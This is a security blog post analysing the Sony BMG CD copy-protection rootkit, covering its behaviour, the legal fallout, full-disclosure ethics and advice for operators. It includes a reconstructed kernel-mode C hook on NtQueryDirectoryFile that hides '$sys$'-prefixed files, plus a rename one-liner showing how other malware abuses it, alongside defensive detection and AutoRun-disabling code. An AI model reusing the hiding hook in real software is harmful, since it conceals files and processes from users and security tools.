Mark Russinovich discovered last week — and published a detailed analysis a few days later — that Sony BMG music CDs install a rootkit on Windows machines as part of their digital-rights-management (DRM) protection. The rootkit hides files and processes; modifies the kernel; provides no uninstaller; introduces exploitable vulnerabilities. Sony has been forced into a recall and faces multiple lawsuits.
This is not a typical incident-response post. The technical details matter; the structural and political implications matter more. The Sony rootkit incident is, on the available evidence, going to be a turning point in how the field thinks about the boundary between legitimate software and malware.
What the rootkit does
When a Sony BMG copy-protected CD is inserted into a Windows machine and the user accepts the EULA presented during AutoRun, the protection software installs:
A kernel-mode driver that hooks the Windows system-call table to hide files, processes, and registry keys whose names start with the prefix $sys$. Anything with that prefix is invisible to standard tools (Explorer, cmd.exe, regedit, Task Manager).
An audio-CD-monitoring service that runs in the background, reports listening activity back to a Sony server, and enforces playback restrictions on the CD's tracks.
A DRM enforcement layer that prevents copying the CD's audio tracks, prevents extraction to MP3, and limits the number of times the user can transfer tracks to other devices.
No uninstaller. The software provides no documented mechanism to remove itself. Users who want to remove it must either reformat their machine, use third-party tools designed for malware removal, or obtain a removal tool from Sony — which Sony only made available after public pressure.
The combination is structurally indistinguishable from typical malware. Files are hidden; the user is not informed of the installation; removal is deliberately difficult; the software phones home without disclosing what it transmits.
The technical analysis
Russinovich's analysis is detailed and worth reading directly. The key technical observations:
The rootkit hooks the syscall table. Specifically, the system calls that enumerate files (NtQueryDirectoryFile), processes (NtQuerySystemInformation), and registry keys (NtEnumerateKey) are intercepted. The interception filters out anything with the $sys$ prefix before returning to the caller. The technique is identical to what malicious rootkits use to hide their files and processes.
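Mechanically, the hiding looks like the sketch below. This is a reconstruction from the published description, not Sony's actual code: the names are mine, only the file-hiding hook is shown, and SSDT write-enable handling, user-buffer probing, and most error paths are omitted.

```c
/* Reconstruction of the hiding pattern, NOT Sony's code. The SSDT entry
   for NtQueryDirectoryFile is swapped for a filter that unlinks any
   directory entry whose name begins with $sys$. */
#include <ntifs.h>

#define HIDE_PREFIX      L"$sys$"
#define HIDE_PREFIX_LEN  (5 * sizeof(WCHAR))

typedef NTSTATUS (*QUERY_DIRECTORY_FILE)(
    HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine,
    PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation,
    ULONG Length, FILE_INFORMATION_CLASS FileInformationClass,
    BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan);

/* Saved original SSDT entry; installation exchanges the table slot for
   HookNtQueryDirectoryFile with the CR0 write-protect bit cleared. */
static QUERY_DIRECTORY_FILE TrueNtQueryDirectoryFile;

static BOOLEAN HasHiddenPrefix(PFILE_BOTH_DIR_INFORMATION e)
{
    return e->FileNameLength >= HIDE_PREFIX_LEN &&
           RtlCompareMemory(e->FileName, HIDE_PREFIX, HIDE_PREFIX_LEN)
               == HIDE_PREFIX_LEN;
}

static NTSTATUS HookNtQueryDirectoryFile(
    HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine,
    PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation,
    ULONG Length, FILE_INFORMATION_CLASS FileInformationClass,
    BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan)
{
    /* Let the real system call fill the buffer, then censor the results
       before they reach the caller. */
    NTSTATUS status = TrueNtQueryDirectoryFile(FileHandle, Event, ApcRoutine,
        ApcContext, IoStatusBlock, FileInformation, Length,
        FileInformationClass, ReturnSingleEntry, FileName, RestartScan);

    if (!NT_SUCCESS(status) ||
        FileInformationClass != FileBothDirectoryInformation)
        return status;

    PFILE_BOTH_DIR_INFORMATION cur  = FileInformation;
    PFILE_BOTH_DIR_INFORMATION prev = NULL;
    while (cur != NULL) {
        PFILE_BOTH_DIR_INFORMATION next = cur->NextEntryOffset != 0
            ? (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)cur + cur->NextEntryOffset)
            : NULL;
        if (HasHiddenPrefix(cur)) {
            if (prev != NULL) {
                /* Unlink: make the previous entry skip over this one. */
                prev->NextEntryOffset = next
                    ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
            } else if (next != NULL) {
                /* Hidden entry is first: slide the rest of the buffer up. */
                SIZE_T gone = (PUCHAR)next - (PUCHAR)cur;
                SIZE_T rest = IoStatusBlock->Information
                              - ((PUCHAR)next - (PUCHAR)FileInformation);
                RtlMoveMemory(cur, next, rest);
                IoStatusBlock->Information -= gone;
                next = cur;           /* re-examine the entry just moved up */
            } else {
                /* Every entry was hidden; a real implementation would
                   re-issue the query rather than end the listing early. */
                status = STATUS_NO_MORE_FILES;
            }
        } else {
            prev = cur;
        }
        cur = next;
    }
    return status;
}
```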
The hiding is indiscriminate. Files named with the $sys$ prefix (any files, not just Sony's) are hidden by the rootkit. Within days of the public disclosure, malware authors had begun exploiting this: anyone who names their files with the prefix becomes invisible to standard tools on any host with the Sony rootkit installed.
This is the structurally significant detail. The Sony rootkit is not just itself malware-like; it actively creates exploitable hiding capabilities for other malware. The DRM measure has become an attack-amplification platform.
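To make the amplification concrete: once the hooks are resident, opting in to the hiding is a one-line rename for any program on the machine. A deliberately harmless illustration; payload.dll is a hypothetical name, not a real component:

```c
/* On a host with the $sys$ hooks resident, the renamed file vanishes
   from Explorer, dir, and any other tool that enumerates through the
   hooked system call. */
#include <windows.h>

int main(void)
{
    MoveFileA("payload.dll", "$sys$payload.dll");
    return 0;
}
```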
The kernel hooks introduce instability. The rootkit's kernel modifications produce occasional system crashes on some hosts. The crashes are intermittent enough that users have not necessarily attributed them to the rootkit; the cumulative reliability cost across the Sony customer base is substantial.
The phone-home is undisclosed. The audio-CD-monitoring service contacts Sony servers without informing the user. The data sent includes information about which tracks are being played and how often. This is undisclosed surveillance; the EULA does not mention it; the user has no way to opt out short of removing the software, which Sony at first provided no supported way to do.
The legal and political dimensions
The response across multiple jurisdictions has been substantial.
United States. The Federal Trade Commission and multiple state attorneys-general have opened investigations. Class-action lawsuits have been filed. Congress has held hearings. The Department of Homeland Security has issued a public advisory characterising the software as a security risk to government systems.
United Kingdom. Sophos and other UK-based security vendors have published technical advisories. The Information Commissioner's Office is reportedly examining the disclosure question.
European Union. The European Commission is examining whether the software constitutes a violation of consumer-protection law and whether it requires disclosure under various data-protection directives.
Japan. Sony's home country has been notably silent in the public response, though internal reporting suggests significant disagreement within the company about how to handle the situation.
The legal response is, in some real sense, the most important consequence of the incident. Whatever specific outcome each jurisdiction reaches, the cumulative effect will be to legally define what software vendors can and cannot do without explicit user consent. The boundary between legitimate software and malware is being drawn in court.
Why this matters beyond Sony
Three things make this incident structurally significant.
A major commercial entity has shipped software that is functionally indistinguishable from malware. Sony BMG is a Fortune 500 company. The software was distributed on CDs sold in retail stores worldwide. The boundary between "legitimate software" and "malware" is, in this case, organisational rather than technical. The same code, with the same behaviour, would be unambiguously labelled malware if it had been written by an underground author.
The implication: the technical definition of malware is insufficient. We need behavioural definitions — what the software does, regardless of who wrote it. This is the conversation that the Sony incident is starting.
The DRM-as-rootkit pattern is going to be reused. Sony is not the only entertainment company using aggressive DRM. Other music labels, movie studios, and software publishers have similar measures or are developing them. The Sony approach was particularly aggressive but the underlying pattern — DRM that requires kernel-level enforcement — is widespread.
The operational implication: Windows machines may be running multiple kernel-level DRM enforcement components, each with its own quirks, each providing potential attack surface. The cumulative effect is a substantial increase in the attack surface of typical Windows installations.
The trust model around commercial software is being re-examined. Until this incident, the implicit assumption was that commercial software from major vendors was trustworthy by default. Sony BMG has demonstrated that this assumption is naïve. Operators must now treat any software, regardless of vendor, with the same suspicion they would treat unknown software.
The practical consequence: operators should be examining what is actually running on their systems, what files exist, what network connections are being made. The traditional discipline of "trust the vendor" is no longer adequate.
The malware authors' response
The most operationally concerning development since the disclosure: malware authors have begun using the Sony rootkit's hiding capabilities. Within days of the public technical analysis, several malware variants were discovered that named their files with the $sys$ prefix. On any host with the Sony rootkit installed, those files become invisible to standard malware-detection tools.
The Sony rootkit is, in effect, a hiding service now available to any malware author who chooses to use it. The author writes their malware to use the prefix; the rootkit (already deployed by Sony's CDs) provides the hiding capability. The malware is invisible to operators who cannot first identify and remove the Sony rootkit.
This is the chain-compromise pattern at the structural level — Sony's software, intended for legitimate use, has become substrate for malicious use. The chain is uncomfortable because the substrate was deployed by a Fortune 500 company on retail CDs, not by an underground worm.
The defensive response requires:
- Identifying which hosts have the Sony rootkit installed.
- Removing the rootkit (which is non-trivial because the rootkit hides itself).
- Auditing for malware that may have been using the hiding capability.
- Restoring host integrity.
The cost of this cleanup is substantial. The cleanup requirement falls on the operators, not on Sony. Sony's response has been recall-focused, not cleanup-focused.
The Russinovich publication question
A brief reflection on the disclosure pattern. Russinovich is an independent researcher (and the founder of Sysinternals). He discovered the rootkit through routine investigation of an unrelated issue on a personal machine. He published the findings on his blog without first notifying Sony.
The disclosure was, by any reasonable measure, full disclosure rather than coordinated disclosure. Sony did not have an opportunity to ship a patch or recall before the public disclosure.
Is this the right approach? My initial instinct, based on the disclosure conventions I have written about, would have been coordinated disclosure: notify Sony privately, give them a defined window to respond, then publish on a stated timeline.
The argument for full disclosure in this specific case: Sony was the vendor, not the victim. The traditional coordinated-disclosure model assumes the vendor is acting in good faith and will use the notification window to fix the issue. Sony was deliberately shipping the rootkit; there was no bug to fix; the problem was the vendor's intentional behaviour.
In this case, the asymmetry of information favoured Sony as long as the issue was private. Public disclosure was the mechanism that triggered the public response — recall, lawsuits, investigations. Coordinated disclosure would have allowed Sony to mitigate the situation privately while continuing to ship the same software on new CDs.
This is, on reflection, a category of disclosure that does not fit the traditional coordinated/full dichotomy. The question is not "how should responsible disclosure work between researcher and vendor?". It is "how should disclosure work when the vendor is the perpetrator?".
My current thinking: when the vendor is the entity creating the problem, full disclosure is justified because the vendor's interests are not aligned with the user's interests. Coordinated disclosure assumes shared interests; this case lacks them.
The field will be working through this question for some time. The Sony incident is the clearest example to date.
What this teaches
Four generalisations.
The malware definition is contested. Whether software gets labelled malicious has historically depended on who shipped it, not just on what it does. The technical features of malware (hiding, persistence, undisclosed phone-home) are now also features of legitimate-but-aggressive commercial software. Operators need to develop frameworks for evaluating software based on what it does, regardless of who shipped it.
Commercial software trust is conditional. The default assumption that vendor-shipped software is trustworthy is no longer defensible. Operators must verify, monitor, and audit even the software they have purchased through legitimate channels.
The legal and regulatory response is substantial. This is genuinely new. For most of the past decade, security incidents have produced legal responses bounded by criminal prosecution of individual attackers. The Sony incident is producing legal responses against a vendor for the design of its software. The legal precedent will, eventually, shape what vendors can ship.
The chain-compromise pattern extends to commercial software. Sony's rootkit is now substrate for malicious use. The pattern of one piece of software becoming substrate for subsequent attacks, which I have written about in the context of worms, now applies to commercial software. The defensive implications are larger.
What operators should do
For anyone managing Windows infrastructure:
Audit for the Sony rootkit. Tools to detect it have been published by multiple security vendors. The audit takes minutes per host; the findings are sometimes surprising (users may have inserted Sony BMG CDs without realising what was being installed).
Remove the rootkit if found. Sony has now published a removal tool, after substantial public pressure. The removal is non-trivial; specialist tools may produce cleaner results than Sony's official tool.
Audit for malware using the $sys$ prefix. Any files or processes with that prefix should be investigated. The Sony rootkit's hiding capability means standard tools may not see them; specialist anti-rootkit tools are needed.
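The same rename trick, turned defensive, gives a cheap first-pass check that needs no specialist tool: create a harmless file, give it the prefix, and ask the Win32 enumeration path whether it can still see it. A minimal sketch, assuming the hiding behaviour described above; the filenames are mine:

```c
/* Canary test for $sys$-prefix hiding. A clean host reports the file
   as visible; a host with the rootkit active cannot see a file it
   just created. */
#include <windows.h>
#include <stdio.h>

int main(void)
{
    const char *plain  = "rootkit-canary.txt";
    const char *hidden = "$sys$rootkit-canary.txt";
    WIN32_FIND_DATAA fd;
    HANDLE h, find;

    /* Create a harmless file under an ordinary name... */
    h = CreateFileA(plain, GENERIC_WRITE, 0, NULL,
                    CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) return 2;
    CloseHandle(h);

    /* ...then give it the magic prefix. */
    if (!MoveFileA(plain, hidden)) { DeleteFileA(plain); return 2; }

    /* Ask the Win32 enumeration path whether the file is still there. */
    find = FindFirstFileA(hidden, &fd);
    if (find == INVALID_HANDLE_VALUE) {
        puts("WARNING: a file we just created is hidden; "
             "something on this host is filtering $sys$ names.");
    } else {
        puts("Canary visible; no $sys$ hiding observed.");
        FindClose(find);
    }

    /* Clean up: rename back, then delete. If cleanup fails on an
       infected host, remove the file after the rootkit is gone. */
    MoveFileA(hidden, plain);
    DeleteFileA(plain);
    return 0;
}
```

A clean host prints the "visible" line. This only detects prefix-based hiding of this particular kind; a negative result does not clear the host, which is why the specialist anti-rootkit tools remain the real answer.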
Consider policy implications. Many organisations are now banning audio CDs from work computers, or disabling AutoRun, or both. The cost-benefit has shifted: the convenience of allowing audio CDs is small; the risk is now demonstrated.
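For the AutoRun route, the machine-wide policy value is NoDriveTypeAutoRun under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer; the documented value 0xFF disables AutoRun for every drive type. A minimal sketch (the surrounding code is mine; requires administrator rights, and the policy applies at the next logon):

```c
/* Disable AutoRun for all drive types machine-wide by setting the
   NoDriveTypeAutoRun policy value to 0xFF. */
#include <windows.h>
#include <stdio.h>

int main(void)
{
    HKEY  key;
    DWORD all_drives = 0xFF;   /* bit mask: every drive type disabled */
    LONG  rc = RegCreateKeyExA(HKEY_LOCAL_MACHINE,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
        0, NULL, 0, KEY_SET_VALUE, NULL, &key, NULL);
    if (rc != ERROR_SUCCESS) {
        fprintf(stderr, "open failed: %ld\n", rc);
        return 1;
    }
    rc = RegSetValueExA(key, "NoDriveTypeAutoRun", 0, REG_DWORD,
                        (const BYTE *)&all_drives, sizeof(all_drives));
    RegCloseKey(key);
    if (rc != ERROR_SUCCESS) {
        fprintf(stderr, "set failed: %ld\n", rc);
        return 1;
    }
    puts("AutoRun disabled for all drive types (effective at next logon).");
    return 0;
}
```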
For operators considering DRM-protected content more generally:
Read the EULA carefully. Or rather: assume the EULA grants the vendor more rights than you would actively want to grant. The Sony EULA, on examination, did technically permit the rootkit installation. The disclosure was inadequate; the technical permission was, arguably, present.
Use playback environments that do not run vendor software. Audio CDs played on dedicated CD players, not on networked computers, eliminate the entire category of risk. The trade-off is convenience.
Watch for similar patterns from other vendors. The Sony pattern can be repeated. Other entertainment-industry vendors are developing similar protection schemes. Subsequent schemes may be more or less aggressive than Sony's; the operational risk profile is similar.
What this changes for the field
Three things, on the medium-term horizon.
Anti-malware vendors are going to need to redefine their scope. Malware definitions traditionally exclude software shipped by major commercial vendors. The Sony incident makes that exclusion untenable. Anti-malware vendors will need to detect and remove software based on behaviour rather than on vendor identity.
This is a substantial cultural shift for the anti-malware industry. Detecting Sony's rootkit means publicly classifying a major media company's software as malware. The legal and commercial implications are non-trivial. The shift will, on the available evidence, happen anyway, because the alternative is to be obviously incomplete.
Operating-system vendors will face pressure to restrict kernel-level access. The Sony rootkit's ability to install kernel-mode code is a structural property of Windows. Microsoft has been signalling for years that this access will be tightened in future versions; the Sony incident accelerates the pressure. Future Windows versions are likely to have stronger restrictions on what can install kernel-mode code.
The trust model will adjust. Operators will become more sceptical of all commercial software. The default-trust assumption will be replaced by default-verify. The specific verification mechanisms — code signing with stronger guarantees, install-time auditing, runtime monitoring — will mature over the next several years.
A small reflection
This is one of the more substantively interesting incidents I have written about. Most incidents I cover are about specific vulnerabilities, specific worms, specific operational responses. The Sony incident is categorical — it is changing how the field thinks about what software vendors can do, what malware is, and what trust between operators and vendors means.
For my own writing: more posts about the trust-model question. The incident has highlighted how much of the security model rests on trust assumptions that have not been examined in some time.
For the field: this is going to be a multi-year conversation. The legal outcomes will take years to resolve. The cultural shift will take longer. The structural improvements will take longer still.
For my own infrastructure: I have always been cautious about what software I install. The Sony incident reinforces the discipline. I will continue to be more cautious than necessary; the cost is small; the benefit, when categorical incidents like this occur, is meaningful.
More as the situation develops.
A closing observation
Russinovich did the field a service by publishing the analysis. The publication has produced substantial change — legal action, recall, public attention, structural conversations. Without the publication, Sony's behaviour would presumably have continued; subsequent vendors would have shipped similar software with confidence; the structural problems would have remained invisible.
The field benefits from researchers who do this kind of work. The professional incentives, however, do not always reward it — Russinovich faced legal threats from Sony; the disclosure could have produced lawsuits against him; the personal cost was non-trivial.
For anyone reading this who is in a position to publish similar analyses: the field needs you. The cost is real; the value is also real; the cumulative effect of this kind of disclosure is what produces structural improvement.
For anyone who appreciates this kind of work: support the researchers who do it. Buy their books, attend their talks, contribute to their projects when invited. The infrastructure of public security research depends on a small population of researchers who can sustain the work over years; their sustainability depends on the rest of us.
More in time.